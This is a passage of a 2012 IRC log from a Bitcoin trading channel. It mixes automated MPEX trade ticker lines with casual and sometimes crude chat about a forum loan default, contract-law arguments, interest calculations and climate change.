exchange" Nov 08 15:12:44 lol ok. seems legit. Nov 08 15:13:03 i wonder why do the kids imagine denying reality is productive ? Nov 08 15:13:43 mpex will never be prominent until it uses twitter bootstrap Nov 08 15:13:52 right-o. Nov 08 15:14:08 i guess my q is misplaced anyway. what else would they do, it's all they ever learn in "school" Nov 08 15:17:12 https://dl.dropbox.com/u/52452135/popescu.jpg ahahah Nov 08 15:17:17 the forum delivers. Nov 08 15:17:53 i guess from now on if anyone asks me how i found out about btc i'ma say "i just happened" Nov 08 15:18:17 good pic Nov 08 15:18:25 and hilarity will ensue as nobody will know the inside joke other than the insiders, which will bother the outsiders. Nov 08 15:18:25 win. Nov 08 15:26:12 [MPEX] [S.MPOE] 26400 @ 0.00049706 = 13.1224 BTC [-] Nov 08 15:27:19 ;;seen kumala Nov 08 15:27:20 I have not seen kumala. Nov 08 15:27:28 ;;seen Kumala Nov 08 15:27:29 I have not seen Kumala. Nov 08 15:27:32 what srsly ? Nov 08 15:51:25 [MPEX] [S.MPOE] 7800 @ 0.00049706 = 3.8771 BTC [-] Nov 08 15:51:26 [MPEX] [S.MPOE] 24297 @ 0.00049563 = 12.0423 BTC [-] Nov 08 16:16:28 [MPEX] [S.MPOE] 10508 @ 0.00049563 = 5.2081 BTC [-] Nov 08 16:18:36 test Nov 08 16:42:12 [MPEX] [S.MPOE] 16042 @ 0.00050077 = 8.0334 BTC [+] Nov 08 16:42:13 [MPEX] [S.MPOE] 2758 @ 0.00050304 = 1.3874 BTC [+] Nov 08 16:53:20 lol,my latent talent has stirred : http://live.coinbr.com/images/cherries.png Nov 08 16:59:39 ahaha! Nov 08 16:59:42 pretty cool Nov 08 17:08:02 [MPEX] [S.MPOE] 18459 @ 0.00050304 = 9.2856 BTC [+] Nov 08 17:13:06 [MPEX] [S.MPOE] 1000 @ 0.00050304 = 0.503 BTC [+] Nov 08 17:38:12 [MPEX] [S.MPOE] 23900 @ 0.00050034 = 11.9581 BTC [-] Nov 08 17:38:14 [MPEX] [S.MPOE] 200 @ 0.00050304 = 0.1006 BTC [+] Nov 08 17:50:35 Do the zooms etc in mouse controls box on this page work for anyone? --> http://galaxies.mygamesonline.org/plotdvc.html Nov 08 18:03:45 [MPEX] [S.MPOE] 30760 @ 0.00049823 = 15.3256 BTC [-] Nov 08 18:03:47 [MPEX] [S.MPOE] 1907 @ 0.00049563 = 0.9452 BTC [-] Nov 08 18:29:15 [MPEX] [S.MPOE] 31242 @ 0.00049448 = 15.4485 BTC [-] Nov 08 18:29:16 [MPEX] [S.MPOE] 17758 @ 0.00049396 = 8.7717 BTC [-] Nov 08 18:54:29 [MPEX] [S.MPOE] 8042 @ 0.00049396 = 3.9724 BTC [-] Nov 08 18:54:30 [MPEX] [S.MPOE] 24158 @ 0.0004933 = 11.9171 BTC [-] Nov 08 19:19:35 [MPEX] [S.MPOE] 38248 @ 0.00049482 = 18.9259 BTC [+] Nov 08 19:19:36 [MPEX] [S.MPOE] 252 @ 0.00049552 = 0.1249 BTC [+] Nov 08 19:45:57 [MPEX] [S.MPOE] 11731 @ 0.00049552 = 5.8129 BTC [+] Nov 08 20:11:11 [MPEX] [S.MPOE] 3000 @ 0.00049668 = 1.49 BTC [+] Nov 08 20:11:12 [MPEX] [S.MPOE] 9100 @ 0.00049667 = 4.5197 BTC [-] Nov 08 20:33:44 Who wants to see WoT used universally, pls comment/upvote: http://www.reddit.com/r/Bitcoin/comments/12udi0/dear_rbitcoin_i_have_a_great_webapp_programming/c6ye5my Nov 08 20:35:18 you know nano is working on otc 2.o neh ? Nov 08 20:36:00 i dont Nov 08 20:36:43 [MPEX] [S.MPOE] 40050 @ 0.0004979 = 19.9409 BTC [+] Nov 08 20:36:45 [MPEX] [S.MPOE] 7778 @ 0.00050001 = 3.8891 BTC [+] Nov 08 20:54:55 did not knew too, but Serajewel informed me... but it seems there won't be identicons nor easily usable API Nov 08 20:55:47 im not entirely clear what'll be like, but i suspect he's gonna try and pull a mpex Nov 08 20:55:55 (make the infrastructure, let others make the interface) Nov 08 20:56:34 yes, mentioned something about gpg-encrypted json Nov 08 20:57:16 oh, apparently i killed someone of kakobrekla's family. nice. Nov 08 20:58:19 http://imgur.com/gallery/YBlrZ Nov 08 20:59:05 couldn't get over these insecurities, eh? Nov 08 21:01:29 say what ?! Nov 08 21:01:40 lol Diablo-D3 Nov 08 21:02:03 [MPEX] [S.MPOE] 14969 @ 0.00049667 = 7.4347 BTC [-] Nov 08 21:02:04 [MPEX] [S.MPOE] 40404 @ 0.000495 = 20 BTC [-] Nov 08 21:02:06 [MPEX] [S.MPOE] 19927 @ 0.0004933 = 9.83 BTC [-] Nov 08 21:07:12 Diablo-D3 ;) Nov 08 21:27:12 [MPEX] [S.MPOE] 8564 @ 0.0004933 = 4.2246 BTC [-] Nov 08 21:27:13 [MPEX] [S.MPOE] 11550 @ 0.00049326 = 5.6972 BTC [-] Nov 08 21:27:14 [MPEX] [S.MPOE] 8636 @ 0.00049295 = 4.2571 BTC [-] Nov 08 21:53:02 [MPEX] [S.MPOE] 34590 @ 0.00049295 = 17.0511 BTC [-] Nov 08 21:53:03 [MPEX] [S.MPOE] 18069 @ 0.00049204 = 8.8907 BTC [-] Nov 08 21:55:12 [MPEX] [O.BTCUSD.C140T] 215 @ 0.10208185 = 21.9476 BTC [+] Nov 08 22:01:26 pigeons https://bitcointalk.org/index.php?topic=119628.msg1313993#msg1313993 Nov 08 22:01:30 apparently i am not needed. Nov 08 22:01:44 knotwork doing all the heavy lifting. Nov 08 22:10:27 without reading before that post, is it DMC 2.0? Nov 08 22:11:21 prolly. Nov 08 22:11:29 they're buying 4 singles except why not go for a rig ? Nov 08 22:11:30 dub Nov 08 22:11:32 order my lunch Nov 08 22:11:35 no one in -otc will do it Nov 08 22:11:44 ya, order him something gross Nov 08 22:11:55 fish tacos enroute Nov 08 22:12:01 ewgh Nov 08 22:14:37 classic convo in -dev, apparently genjix doesnt irc anymore because all the arugments are a waste of time Nov 08 22:15:52 1. Fuckup in every conceivable way, losing shitloads of everyone elses money Nov 08 22:16:03 2. Vanish because arguments waste your time Nov 08 22:16:12 3. ???? Nov 08 22:16:25 4. Priceless Nov 08 22:16:31 amidoitrite? Nov 08 22:17:13 dub he doesn't irc anymore because when he tried to come here and "vouch" for nefario i told him where to stick it Nov 08 22:17:29 subsequently he whined @ my datacenter about "cp" which went nowhere Nov 08 22:17:33 so he is upset at internets Nov 08 22:17:38 and might even delete his livejournal! Nov 08 22:17:49 haha Nov 08 22:17:55 FOR EVER Nov 08 22:18:07 not HIS LJ PLEASE JESUS Nov 08 22:19:22 https://bitcointalk.org/index.php?topic=115669.msg1324805#msg1324805 << meanwhile back at the loony farm... Nov 08 22:19:35 i seriously do not understand what psych majors/grad students are thinking. Nov 08 22:19:57 there does not exist a mental hospital that could in any conceivable way offer a more fertile field of study. Nov 08 22:20:05 they should all be here 24/7. Nov 08 22:20:34 [MPEX] [S.MPOE] 30500 @ 0.00049204 = 15.0072 BTC [-] Nov 08 22:20:56 https://github.com/phelixbtc/ncsc Nov 08 22:21:29 I try to read what dishwara wrote and I urgently need to take a shit Nov 08 22:21:40 coincidence? Nov 08 22:25:52 might be from that fish taco Nov 08 22:43:39 78 pages? nope. Nov 08 22:46:12 [MPEX] [S.MPOE] 9231 @ 0.00049204 = 4.542 BTC [-] Nov 08 22:46:14 [MPEX] [S.MPOE] 6319 @ 0.00049009 = 3.0969 BTC [-] Nov 08 23:11:22 [MPEX] [S.MPOE] 7469 @ 0.00049333 = 3.6847 BTC [+] Nov 08 23:11:23 [MPEX] [S.MPOE] 31788 @ 0.00049366 = 15.6925 BTC [+] Nov 08 23:36:47 [MPEX] [S.MPOE] 10964 @ 0.00049443 = 5.4209 BTC [+] Nov 08 23:58:13 lol, mircea_popescu MPOE-PR posts a defaulted contract asking for a scammer tag and gets trolled hard, I post a defaulted contract asking for a scammer tag and get satisfaction in a day or so Nov 08 23:58:27 link ? Nov 08 23:59:19 mpoe-pr https://bitcointalk.org/index.php?topic=121915.0 me https://bitcointalk.org/index.php?topic=118507.0 Nov 09 00:01:49 [MPEX] [S.MPOE] 16450 @ 0.00049009 = 8.062 BTC [-] Nov 09 00:02:18 ya well.... compare who you're going after. Nov 09 00:02:26 usagi is like, the inventor of milk. Nov 09 00:03:15 but i vaguely recall you being trolled a little re arbitrage there too >D Nov 09 00:04:06 yeah, but that's nothing like, "you were both mistaken, so mircea, you lose the btc" Nov 09 00:04:41 lol the stuff people came up with in that thread i swear. Nov 09 00:04:55 also, it shouldn't matter who you are if you've defaulted on a contract, you have still defaulted on the contract Nov 09 00:05:53 mircea_popescu: well, the issue joelK raised is "legit", but the solution in that case would be to return the full amount of the principle to you Nov 09 00:06:12 what issue is that ?! Nov 09 00:06:42 the common mistake thing Nov 09 00:06:43 read to me like "five year olds can not enter into contracts therefore anything anyone says is invalid" sort of bs. Nov 09 00:06:51 do explain. Nov 09 00:16:08 you don't recognise this sort of thing mircea_popescu http://en.wikipedia.org/wiki/Mistake_(contract_law)#Common_mistake Nov 09 00:16:41 I don't mean to suggest that it's aplicable in your case tho Nov 09 00:16:44 yes, but i completely fail to see how you reason. Nov 09 00:17:03 i mean, if me and patrick had a contract about this online currency which we both believed existed cause we read on something awful Nov 09 00:17:04 I think PH (possibly thru his own ignorrance) mislead you Nov 09 00:17:07 but then it turned out it didn't exist Nov 09 00:17:11 that'd be a common mistake. Nov 09 00:17:20 mislead me as to what ? Nov 09 00:17:32 his pirate exposure Nov 09 00:17:41 so ? Nov 09 00:17:49 that's a misrepresentation of fact, not a common mistake. Nov 09 00:18:07 heh, miscommunication here Nov 09 00:18:12 smickles Nov 09 00:18:15 but these distinctions are important. Nov 09 00:18:22 monopoly fo sure tonight Nov 09 00:19:15 if i sell you 100 acres of land which is registered improperly and it turns out it's really 99, and i had no idea, and you had no idea then it could be argued. Nov 09 00:19:27 if i sell you 100 acres of land out of a plot of which i already sold someone an acre... Nov 09 00:20:35 mircea_popescu: i brought up the issue of common mistake because I think that, if for whatever reason the parties involved decided to declare a common mistake, JoelK's suggestion that PH return anything less than the principal is wrong Nov 09 00:21:07 jk's ideas are all over the place in any event. Nov 09 00:21:50 thestringpuller, or should I say, sleeps-when-said-be-awake Nov 09 00:21:55 basically here's how that thing works : if i'm a bank and i cash a cheque drawn fraudulently by a CEO on his company Nov 09 00:22:11 i won't be held liable, if i acted in good faith. it's between the ceo and the company. Nov 09 00:22:13 i'm up for monopoly at 4 utc :) Nov 09 00:24:55 mircea_popescu: that senario seems wrong to me Nov 09 00:25:20 why ? Nov 09 00:25:48 the common mistake was thinking patrick would repay Nov 09 00:25:48 that sound more like fraud, rather than a common mistake Nov 09 00:26:40 no looky, understand me : Nov 09 00:26:47 you are the ceo of widgets, inc. Nov 09 00:27:02 [MPEX] [S.MPOE] 18692 @ 0.00049009 = 9.1608 BTC [-] Nov 09 00:27:04 [MPEX] [S.MPOE] 11958 @ 0.00048916 = 5.8494 BTC [-] Nov 09 00:27:04 one day you decide to fuck it all, leave for cuba with your secret lover. Nov 09 00:27:15 you draw a 500k cheque on the company, come to my bank, cash it. Nov 09 00:27:22 you get 500k in cash, board a plane and you're gone. Nov 09 00:27:38 the company can't now sue me for 500k. it will have to go sue in cuba. Nov 09 00:28:09 i just did what i normally do : execute what the ceo says i should. it;'s not my job to police the corporate officers of widgets, inc. Nov 09 00:29:01 the argument seems to be that PH is himself a victim of his customers scams, not a scammer Nov 09 00:29:17 ie, they promised not to deposti his funds in pirate Nov 09 00:29:31 there's that Roswell State Bank v. Lawrence Walker Cotton Co. case on the subject. Nov 09 00:29:45 but he claimed he can handle the scammers no? Nov 09 00:29:47 dub that may well be true. but he can't pass it along to me. he will have to go prosecute them himself. Nov 09 00:30:32 kakobrekla i didn't buy shares in a fund he administered (that's a diff scam he pulled). i just loaned him money. Nov 09 00:30:32 yes well thats a problem with the scammer tag system Nov 09 00:30:50 it seems to imply intent to scam Nov 09 00:31:20 scammer tag is only minimally relevant. the big deal here is that unlike in the pirate case, where everyone involved tried their darndest to hide the ugly truth in the hope they can offload on suckers Nov 09 00:31:24 i punctured this lie bubble. Nov 09 00:31:57 [05:28:03] i just did what i normally do : execute what the ceo says i should. it;'s not my job to police the corporate officers of widgets, inc. Nov 09 00:32:00 in general the way this shit goes is "let's not admit that we've been scammed" Nov 09 00:32:02 as long as you're not an executive officer Nov 09 00:32:10 Diablo-D3 in that example i was the bank. Nov 09 00:32:19 then yes, you know nothing, legally. Nov 09 00:32:40 right. Nov 09 00:33:04 Im not scrolling up, but how did we get to the point that this was being argued over? Nov 09 00:33:07 anyway, for those interested on common mistake caselaw, bell vs lever brothers is the cannonical, lawschool textbook example. Nov 09 00:33:19 Diablo-D3 the patrick hanrett scammer thread in btctalk Nov 09 00:33:26 mircea_popescu: summarize plz kthx Nov 09 00:33:57 patrick harnett was hoping to get away with a soft default because he's a special snowflake, Nov 09 00:34:04 it didn't work. Nov 09 00:34:33 it's pretty funny because he's not going to be able to ever find work in his profession again. Nov 09 00:36:00 his assertion that he would cover from private funds is key Nov 09 00:36:36 well, on one avenue of inquiry yes it is. Nov 09 00:38:19 if a business defaults because its debtors default the liability lies with those debtors Nov 09 00:38:40 depending on its legal setup Nov 09 00:38:45 https://bitcointalk.org/index.php?topic=121915.msg1323947#msg1323947 tbh that's my favourite part of it all. Nov 09 00:39:22 dub depends if the business was in the business of picking debtors. Nov 09 00:39:59 but the protections of "default" irl don't quite exist in bitcoin. Nov 09 00:41:22 well IRL a lending business has insurance and if the insurer defaults a govt bails it out Nov 09 00:41:32 so its kinda the same Nov 09 00:42:03 except you got fucked directly instead of via a taxman Nov 09 00:42:08 okay, Im on drugs Nov 09 00:42:11 who is patrick harnett? Nov 09 00:42:22 Diablo-D3 some forum banker wannabe. Nov 09 00:42:29 was giving people ratings at some point. Nov 09 00:42:37 whats his professional identity? Nov 09 00:42:58 he's a private consultant, energy broker. Nov 09 00:43:13 http://www.srgexpert.com/patrick.html Nov 09 00:43:14 ahh, so his name is his brand? Ive never heard of him Nov 09 00:43:29 back to sleep with you Nov 09 00:43:56 considering how much he actually has at stake i am uniquely impressed with how stupid he's been. Nov 09 00:44:08 i guess people still fail to understand how deep the internet can come to bite you. Nov 09 00:44:14 yeah really Nov 09 00:44:17 dont fuck with the net Nov 09 00:44:30 thats why Im just sitting back and watching nefario try to find some internet proof anal bum cover. Nov 09 00:44:53 but in his case, fraud means he has to be fired (by law) Nov 09 00:45:05 and he has to disclose that on all future applications (which means he can't be hired) Nov 09 00:45:16 wait, does fraud with bitcoins still equal fraud? Nov 09 00:45:19 and quite frankly nearing 50 and trying to change careers in this economy... Nov 09 00:45:26 does he have to fire himself? Nov 09 00:45:29 Diablo-D3 if you think i'm not sueing him you're naive. Nov 09 00:45:35 dub yea, actually. Nov 09 00:45:37 mircea_popescu: oh, well, yeah, theres that Nov 09 00:45:46 okay so, he fires himself... then... rehires himself? Nov 09 00:45:59 Diablo-D3 and you know what ? my jurisdiction allows me to sue him locally. i hope he speaks romanian and is versed in the law. Nov 09 00:46:27 yeah, but isnt he american? Nov 09 00:46:30 how do you get the money Nov 09 00:46:39 nz. Nov 09 00:46:44 its not money its bitcoin. Nov 09 00:46:46 i don't want the money. Nov 09 00:46:46 :p Nov 09 00:46:56 i couldn't care less about teh 500. i want his head. Nov 09 00:47:07 500 btc or 500 usd/euros/whatevers? Nov 09 00:47:12 500 btc Nov 09 00:47:23 fuck dude, thats like, more than I make in a month :< Nov 09 00:47:24 500 NZ-sheeptokens Nov 09 00:47:31 lol Nov 09 00:47:40 Diablo-D3 well in a good month i make that every 3rd day Nov 09 00:47:44 but this is besides teh point Nov 09 00:48:32 Diablo-D3: you have a job now? Nov 09 00:49:07 or they give you a $5k/month benefit? Nov 09 00:49:12 no wonder US is fucked Nov 09 00:49:22 he's a lumberjack and he's ok Nov 09 00:49:28 he works all night and he drinks all day... Nov 09 00:49:46 we give them ~$1k/month Nov 09 00:50:04 more when they breed Nov 09 00:50:11 dub: I said more than. Nov 09 00:50:20 like, a lot more than. Nov 09 00:50:29 idiot Nov 09 00:50:44 that expression is for use when its comparable Nov 09 00:51:00 it is > than. Nov 09 00:51:12 why all the hate ? Nov 09 00:51:14 ;;ticker Nov 09 00:51:15 BTCUSD ticker | Best bid: 10.88000, Best ask: 10.96063, Bid-ask spread: 0.08063, Last trade: 10.96065, 24 hour volume: 25505.17163532, 24 hour low: 10.75000, 24 hour high: 11.07000, 24 hour vwap: 10.92276 Nov 09 00:51:15 so I gues syou use that a lot anyway Nov 09 00:51:26 ;;calc 10.88 * 500 Nov 09 00:51:26 5440 Nov 09 00:51:27 a dollar?! thats more than I make in a month Nov 09 00:51:38 ;;calc 5440 / 844 Nov 09 00:51:39 6.44549763033 Nov 09 00:51:52 holy fuck, its more than I make in 6 months =/ Nov 09 00:52:07 you should go into finance. Nov 09 00:52:10 lots of money there. Nov 09 00:52:27 not many people will accept that receiving an unemployment benefit == making money Nov 09 00:52:54 dub: thank god I dont. Nov 09 00:53:06 mircea_popescu: I tried that once, but then realized I'd have to be nice to douchebags Nov 09 00:53:11 [MPEX] [S.MPOE] 22339 @ 0.00048916 = 10.9273 BTC [-] Nov 09 00:53:28 haha that;s one way to look at it. Nov 09 00:53:43 you have to be at least as nice as my sick hound pr chick Nov 09 01:00:09 mircea_popescu: hot pr chick* ftfy Nov 09 01:18:12 [MPEX] [S.MPOE] 8553 @ 0.00048916 = 4.1838 BTC [-] Nov 09 01:18:14 [MPEX] [S.MPOE] 9863 @ 0.00048806 = 4.8137 BTC [-] Nov 09 01:23:19 man Nov 09 01:23:32 whats the shortest way of converting interest per day into interest per year Nov 09 01:27:43 diablo 1.0x ^ 365 Nov 09 01:28:59 derp. Nov 09 01:29:03 I fail at maths. Nov 09 01:29:45 mircea_popescu: wait, that cant be right Nov 09 01:30:24 it is. what's your daily interest ? Nov 09 01:31:00 0.24%, which according to your math I end up with a little more than 2x than I started with Nov 09 01:32:03 ;;calc 1.0024 ^ 365 Nov 09 01:32:04 Error: Something in there wasn't a valid number. Nov 09 01:32:08 ;;calc 1.0024 ** 365 Nov 09 01:32:09 2.39875650196 Nov 09 01:32:12 huh Nov 09 01:32:14 that's it. Nov 09 01:32:23 mircea_popescu: okay so Nov 09 01:32:34 according to today's fictional stock portfolio performance Nov 09 01:32:41 over the next year if the s&p 500 does not move at all Nov 09 01:32:48 and every day is like today Nov 09 01:32:52 I could double my money Nov 09 01:33:07 ergo, I have just proved wall street is a scam, QED Nov 09 01:33:13 lol right. Nov 09 01:33:23 prove global warming too, since you got the tools ready. Nov 09 01:33:44 its snowing outside, ergo global warming is real, QED Nov 09 01:33:48 "temperature somewhat measured has varied somewhat in the past 50 or so years, therefore global warming" Nov 09 01:34:45 well I dont think thats what science is saying Nov 09 01:34:59 but it helps the retarded to rationalise like that Nov 09 01:35:19 'LOL its colder today than it was yesterday global warming is a lie' Nov 09 01:35:46 disregard 99.9% of scientists Nov 09 01:35:47 dub: I said the exact opposite Nov 09 01:35:56 it almost never snows this early Nov 09 01:36:29 my point is superficial observations like, its cold or hot today/this year/this decade are meaningless Nov 09 01:36:52 yeah, we really need the last million years of data Nov 09 01:36:59 and thats hard, but not impossible, to acquire Nov 09 01:37:01 well we have that Nov 09 01:37:46 the data indicates we're overdue for an ice age Nov 09 01:38:27 the data also indicates it can get hotter than this and, although we're not making a real change at all,it could be the difference between survival and not Nov 09 01:38:27 the data indicates undeniable human influence in atmospheric carbon levels Nov 09 01:38:50 the world can survive an additional degree of average temp Nov 09 01:38:50 lol Nov 09 01:38:51 we cannot. Nov 09 01:39:03 and that may be the sum total of environment change by 2050 by the human race Nov 09 01:41:51 well, no Nov 09 01:42:34 dub: 1 degree of global temp is quite a lot of carbon Nov 09 01:42:34 but denial helps people sleep at night Nov 09 01:42:42 dub: btw, Im not denying it Nov 09 01:42:56 DENY IT DENIER! Nov 09 01:43:20 [MPEX] [S.MPOE] 22670 @ 0.00049385 = 11.1956 BTC [+] Nov 09 01:43:22 its not just about carbon Nov 09 01:43:26 dub: 1 degree of heat, globally, would be catastrophic Nov 09 01:44:20 theres rainforswt dieback, wholesale rape and poisoning of the ocean Nov 09 01:44:22 the lodgepole pine is going away in ~100yrs Nov 09 01:44:33 you can rape.. the ocean?! Nov 09 01:44:45 how the hell does that work.. Nov 09 01:44:47 sure ask china, japan, the US Nov 09 01:44:56 you kill all the fish Nov 09 01:45:04 I refuse to provide evidence for your water fetish. Nov 09 01:45:19 and leach too much superphosphates into the water Nov 09 01:45:39 "super"phosphates? Nov 09 01:45:53 yes Nov 09 01:46:22 they have a little S on the front Nov 09 01:48:24 looks as though the process to create superphosphates is the more environmentally damaging.. Nov 09 01:49:23 the fallout of it leaching into the water is one of the most obvious and dramatic affects of pollution Nov 09 01:49:48 you mean the effects of crappy oversight in the production facilities where these chemicals are made.. Nov 09 01:49:59 no, where they are used Nov 09 01:50:16 runoff from farming Nov 09 01:50:58 that used to be a common complaint. however, using too much so that the plants don't actually consume it, is a strong economic disincentive for its misuse. Nov 09 01:52:24 it may have improved but still a major problem Nov 09 01:53:35 not that its the only environmental impact of horticulture Nov 09 01:54:29 s/horti/agri/ Nov 09 02:09:20 [MPEX] [S.MPOE] 28711 @ 0.00048806 = 14.0127 BTC [-] Nov 09 02:09:21 [MPEX] [S.MPOE] 4089 @ 0.00048789 = 1.995 BTC [-] Nov 09 02:34:44 [MPEX] [S.MPOE] 15500 @ 0.00048789 = 7.5623 BTC [-] Nov 09 02:59:54 [MPEX] [S.MPOE] 1566 @ 0.00049385 = 0.7734 BTC [+] Nov 09 02:59:55 [MPEX] [S.MPOE] 23134 @ 0.00050001 = 11.5672 BTC [+] Nov 09 03:25:30 [MPEX] [S.MPOE] 7846 @ 0.00048789 = 3.828 BTC [-] Nov 09 03:25:32 [MPEX] [S.MPOE] 37907 @ 0.00048764 = 18.485 BTC [-] Nov 09 03:25:32 [MPEX] [S.MPOE] 1847 @ 0.00048681 = 0.8991 BTC [-] Nov 09 03:37:02 people gots ta eat Nov 09 03:50:55 [MPEX] [S.MPOE] 17453 @ 0.00048681 = 8.4963 BTC [-] Nov 09 03:50:57 [MPEX] [S.MPOE] 16847 @ 0.00048676 = 8.2004 BTC [-] Nov 09 04:16:14 [MPEX] [S.MPOE] 16353 @ 0.00048676 = 7.96 BTC [-] Nov 09 04:16:15 [MPEX] [S.MPOE] 37397 @ 0.00048657 = 18.1963 BTC [-] **** BEGIN LOGGING AT Fri Nov 9 11:25:01 2012 Nov 09 11:29:27 domainforsale809 2:52 am you can purchase "mpex.cn" with a very fair price. Nov 09 11:29:33 these dudes with the .cn domains... Nov 09 11:31:52 [MPEX] [S.MPOE] 10100 @ 0.00049367 = 4.9861 BTC [+] Nov 09 11:57:14 [MPEX] [S.MPOE] 11150 @ 0.00049021 = 5.4658 BTC [-] Nov 09 11:57:16 [MPEX] [S.MPOE] 45072 @ 0.00049547 = 22.3318 BTC [+] Nov 09 11:58:14 1.5 billion people, what a market :) Nov 09 11:58:37 heh. Nov 09 12:05:03 lol i see joalkatz is still at it Nov 09 12:06:01 that thing still going ? Nov 09 12:07:28 since i saw it last atleast Nov 09 12:22:21 [MPEX] [S.MPOE] 6165 @ 0.00048974 = 3.0192 BTC [-] Nov 09 12:22:23 [MPEX] [S.MPOE] 23535 @ 0.00048891 = 11.5065 BTC [-] Nov 09 12:47:55 [MPEX] [S.MPOE] 43700 @ 0.00049517 = 21.6389 BTC [+] Nov 09 13:13:16 [MPEX] [S.MPOE] 9150 @ 0.00049517 = 4.5308 BTC [+] Nov 09 13:38:27 [MPEX] [S.MPOE] 18593 @ 0.00048992 = 9.1091 BTC [-] Nov 09 13:38:28 [MPEX] [S.MPOE] 5565 @ 0.00048891 = 2.7208 BTC [-] Nov 09 14:03:44 [MPEX] [S.MPOE] 15600 @ 0.00048824 = 7.6165 BTC [-] Nov 09 14:03:46 [MPEX] [S.MPOE] 7250 @ 0.00048797 = 3.5378 BTC [-] Nov 09 14:13:40 [MPEX] [S.DICE] 300 @ 0.00339943 = 1.0198 BTC [+] Nov 09 14:38:53 [MPEX] [S.MPOE] 24426 @ 0.00048797 = 11.9192 BTC [-] Nov 09 14:38:54 [MPEX] [S.MPOE] 9569 @ 0.00048566 = 4.6473 BTC [-] Nov 09 14:38:56 [MPEX] [S.MPOE] 418 @ 0.00048434 = 0.2025 BTC [-] Nov 09 15:04:02 [MPEX] [S.MPOE] 15500 @ 0.00048434 = 7.5073 BTC [-] Nov 09 15:11:17 ;;bc,stats Nov 09 15:11:19 Current Blocks: 207185 | Current Difficulty: 3304356.3929903 | Next Difficulty At Block: 207647 | Next Difficulty In: 462 blocks | Next Difficulty In About: 3 days, 1 hour, 32 minutes, and 6 seconds | Next Difficulty Estimate: 3384633.63150263 | Estimated Percent Change: 2.42943644586 Nov 09 15:27:35 when is halving day? Nov 09 15:29:58 [MPEX] [S.MPOE] 11282 @ 0.00048434 = 5.4643 BTC [-] Nov 09 15:30:00 [MPEX] [S.MPOE] 9269 @ 0.00048328 = 4.4795 BTC [-] Nov 09 15:33:14 between 29 Nov 9:15 UTC (-2%) and 27 Nov 16:15 UTC (10%) Nov 09 15:34:57 prolly on the 25th Nov 09 15:43:01 that only if bfl ships/mines. Nov 09 15:45:34 i expect huge difficulty rise for many alt coins lol Nov 09 15:45:47 gpu miners are going to get killed Nov 09 15:56:17 [MPEX] [S.MPOE] 31155 @ 0.00048558 = 15.1282 BTC [+] Nov 09 16:21:24 [MPEX] [S.MPOE] 5600 @ 0.00048328 = 2.7064 BTC [-] Nov 09 16:46:54 [MPEX] [S.MPOE] 14792 @ 0.00048558 = 7.1827 BTC [+] Nov 09 17:11:51 [MPEX] [S.MPOE] 12155 @ 0.00048328 = 5.8743 BTC [-] Nov 09 17:11:53 [MPEX] [S.MPOE] 7445 @ 0.00048289 = 3.5951 BTC [-] Nov 09 17:37:08 [MPEX] [S.MPOE] 11955 @ 0.00048289 = 5.7729 BTC [-] Nov 09 17:37:09 [MPEX] [S.MPOE] 20045 @ 0.00048256 = 9.6729 BTC [-] Nov 09 17:41:27 am i doing this right? http://images.4chan.org/g/src/1352469351413.jpg Nov 09 17:41:31 :) Nov 09 17:41:48 yep Nov 09 17:42:25 http://images.4chan.org/g/src/1352472748203.jpg Nov 09 17:42:27 oh lol Nov 09 17:43:24 I hate it when my mobo gets dirty too Nov 09 17:43:51 :) Nov 09 17:46:43 http://wikispeed.com/ what is this and why do they take btc? Nov 09 17:48:31 its a car they build like "agile" software, they keep making new revs. they take btc cause they are "disruptive" like that ;) Nov 09 17:48:45 :) Nov 09 17:49:10 someone on 4chan said they found it on bitcoinfriday.com a site i dont know about Nov 09 17:49:15 however that site wont load for me :/ Nov 09 17:49:26 i guess bitcoin friday is a meme or something on /g/ Nov 09 17:49:28 not sure... Nov 09 17:53:49 loading now Nov 09 17:53:52 intersting site Nov 09 17:54:01 odd i heard about it on 4chan and not the forum or irc Nov 09 17:54:03 thats good Nov 09 18:01:25 https://bitcointalk.org/index.php?topic=121915.msg1325789#msg1325789 << first ever claim for bitcointalk legal expenses ? Nov 09 18:01:50 btw https://bitcointalk.org/index.php?topic=123492.0 Nov 09 18:02:00 these things keep popin up! Nov 09 18:02:01 :) Nov 09 18:02:15 [MPEX] [S.MPOE] 7203 @ 0.00048558 = 3.4976 BTC [+] Nov 09 18:02:16 [MPEX] [S.MPOE] 18397 @ 0.00048841 = 8.9853 BTC [+] Nov 09 18:02:40 lol Nov 09 18:02:51 ofcourse. the word got out bitcoin has gathered a large collection of suckers. Nov 09 18:09:38 bitcointalk legal expenses ? Nov 09 18:09:43 where do you see that? Nov 09 18:10:13 is your link correct? Nov 09 18:10:38 i'm looking Nov 09 18:10:47 For the record, the sought compensation is detailed below: Nov 09 18:10:47 500 BTC capital Nov 09 18:10:47 + 1% per week until the date of full repayment. Currently this is 14 weeks (since August the 10th), or 74.7371065 BTC Nov 09 18:10:47 + .01 BTC per word of my posts in this thread. Currently this is 3935 words = 39.35 BTC Nov 09 18:10:47 + Treble damages (punitive). Nov 09 18:10:47 Total sought (if discharged today): 1842.2613195 BTC. Nov 09 18:10:50 legal expenses of what? Nov 09 18:10:55 that 0,01 btc per word is a fine precedent. Nov 09 18:11:03 enky for prosecuting a claim in bitcoincourt. Nov 09 18:11:56 oh, i did not understand you, i thought the forum was under attack or something Nov 09 18:12:00 a no Nov 09 18:12:08 just drama as per ususal. Nov 09 18:12:12 joel is lol Nov 09 18:12:22 that thread really delivers. Nov 09 18:12:36 he is the only one in the world who would agree with his points on this Nov 09 18:12:49 i hope he is neer a jeduge in real life Nov 09 18:13:33 judge* Nov 09 18:13:34 i think he's something like unemployed overqualified california type. Nov 09 18:14:35 he is well known for something Nov 09 18:14:43 but yeah i think you are right Nov 09 18:14:53 certanly nothing in the legal profession, way too clueless for that. Nov 09 18:15:29 i mean its not even about agreeing or not, it's like, you never heard of san francisco Nov 09 18:15:38 well, if you never heard of san francisco you're not from the us Nov 09 18:15:49 irrespective if you like obama or romney or ron paul Nov 09 18:16:14 he did something with encryption i think Nov 09 18:16:44 iv been to sf, i dont follow Nov 09 18:16:56 suppose someone says "i'm from the us" Nov 09 18:17:03 and someone else says "no you're not". Nov 09 18:17:18 now, if these two are maybe having an argument about politics, i could see it as a thing you say, you know ? Nov 09 18:17:33 but if the first person literally has no idea sf exists... then that's that. they're not from the us. Nov 09 18:28:56 [MPEX] [S.MPOE] 35350 @ 0.00048256 = 17.0585 BTC [-] Nov 09 18:28:58 [MPEX] [S.MPOE] 10928 @ 0.00048224 = 5.2699 BTC [-] Nov 09 18:52:45 [MPEX] [S.MPOE] 11429 @ 